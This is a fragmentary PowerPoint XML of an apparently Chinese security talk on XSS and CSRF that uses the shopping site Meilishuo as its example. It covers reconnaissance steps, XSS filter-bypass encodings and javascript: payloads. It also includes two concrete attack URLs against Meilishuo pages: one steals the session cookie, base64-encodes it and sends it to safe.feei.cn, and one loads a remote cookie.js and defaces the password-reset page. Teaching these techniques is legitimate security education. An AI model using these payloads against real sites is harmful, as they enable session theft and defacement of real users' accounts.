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14-5-16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meilishuo.com/user/findPwd/send_email?email" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://account.meilishuo.com/user/findPwd/send_email?email=%3Cscript%20src=%22http://safe.feei.cn/cookie.js%22%3E%3C/script%3E%3Cstyle%3E.success%7Bdisplay:none;%7D.findPwdForm%7Bfont-size:24px;text-align:center;%7D.findPwdForm:before%7Bcontent:%22Hey%20man,you%20got%20cracked%20%E2%80%93%20Feei%20Team!%22%7D.logo_new%7Bbackground:url(%22http://feei.cn/_assets/img/logo.png%22);width:230px;height:40px;%7D.flowStep%7Bdisplay:none;%7D%3C/style%3E%3Cscript%3Ealert('Feei%20Team')%3C/script%3E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eilishuo.com/search?searchKey=./?%3C%3C%3C%22%22%3E%3Cscript%3Evar%20c%20=%20btoa(document.cookie);var%20b%20=%20'http://safe.feei.cn/admin.php?location=';var%20a%20=%20%5B%5D;a.push(b);a.push(c);a.join('');window.location.href=a;%3C/script%3E%3E&amp;searchType=1&amp;filter=goods&amp;frm=searchsuggestion&amp;suggest_frm=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8000" dirty="0" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="8000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>SAFE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2248274"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="4200" dirty="0" smtClean="0"/>
              <a:t>XSS/CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>实例对象：美丽说</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>吴止介</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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7204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00500" y="250825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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>谢谢！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6125" y="3530084"/>
            <a:ext cx="586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注：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PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>以及相关工具</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请通过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zhijie@mogujie.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>索要！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常见漏洞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0775" y="2922494"/>
            <a:ext cx="2863850" cy="3267169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信息泄露</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>权限绕过</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>弱口令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包含</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>社会工程</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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92174" y="2922494"/>
            <a:ext cx="3298825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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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跨站脚本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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CSRF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跨站请求伪造</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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注入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代码执行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文件上传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494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204694"/>
            <a:ext cx="5559425" cy="985931"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>踩点</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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4024" y="1552015"/>
            <a:ext cx="6769101" cy="496280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准备工作：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>工具：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>BT5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>、网站扫描、截包篡改、数据接收与通知</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>数据：弱口令库、综合库、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>解密库</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>信息收集：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>域名：域名注册商、域名注册信息、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>域传送</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>服务器：端口、软件版本</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>搜索引擎：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Robots</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Baidu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>intitle</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>全盘扫描网站：全站链接、常见后台地址、常见软件名、常规备份地址</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l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343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5051425" y="631015"/>
            <a:ext cx="3635375" cy="5528485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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>输入框</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>找回密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>网站后台</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>带参数的链接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400" dirty="0" smtClean="0"/>
              <a:t>上传图片</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>未检查权限</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>备份文件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>日志文件</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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150679" y="2812474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</a:rPr>
              <a:t>常见弱点</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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6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7069"/>
            <a:ext cx="6400800" cy="827181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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>常规利用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024" y="984250"/>
            <a:ext cx="7578726" cy="567718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现状：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpOnly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Filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Filter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()/blacklist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特殊编码：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实体</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/Unicode/Hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>embed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zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript:alert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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Unicode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S-&gt;&amp;#115;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=&gt;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-&gt;&amp;#49;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S-&gt;&amp;#49;5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Unicode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Hex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T-&gt;\u0074</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;embed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=java&amp;#1&amp;#49;5;cript:alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>documen</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>\u0074.c\u006fokie)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过正则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sCript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/&lt;script</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;a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href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javascript:alert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window.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)&gt;Click&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IE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expression:&lt;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style=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xxx:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>window.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>))&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l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02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867" y="1341700"/>
            <a:ext cx="80246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linkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>eilishuo.com/</a:t>
            </a:r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search?searchKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=.%2F%3F%3C%3C%3C%22%22%</a:t>
            </a:r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3E</a:t>
            </a:r>
          </a:p>
          <a:p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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>3Cscript%</a:t>
            </a:r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3E</a:t>
            </a:r>
          </a:p>
          <a:p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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>%20c%20=%20btoa(document.cookie)</a:t>
            </a:r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;</a:t>
            </a:r>
          </a:p>
          <a:p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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>%20b%20=%20%27http://safe.feei.cn/admin.php?location=%27</a:t>
            </a:r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;</a:t>
            </a:r>
          </a:p>
          <a:p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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>%20a%20=%20[]</a:t>
            </a:r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;</a:t>
            </a:r>
          </a:p>
          <a:p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a.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(b);a.push(c);a.join(%27%27)</a:t>
            </a:r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;</a:t>
            </a:r>
          </a:p>
          <a:p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window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=a</a:t>
            </a:r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;</a:t>
            </a:r>
          </a:p>
          <a:p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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>3C%2Fscript%3E%</a:t>
            </a:r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3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>searchType=1&amp;filter=goods&amp;frm=searchsuggestion&amp;suggest_frm=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867" y="4163076"/>
            <a:ext cx="11376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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://account.meilishuo.com/user/findPwd/send_email?email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3Cstyle%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>3E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>success{display:none;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>findPwdForm{font-size:24px;text-align:center;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>findPwdForm:before{content:%22Hey%20man,you%20got%20cracked%20%E2%80%93%20Feei%20Team!%22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>logo_new{background:url(%22http://feei.cn/_assets/img/logo.png%22)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>;width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>:230px;height:40px;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0" smtClean="0">
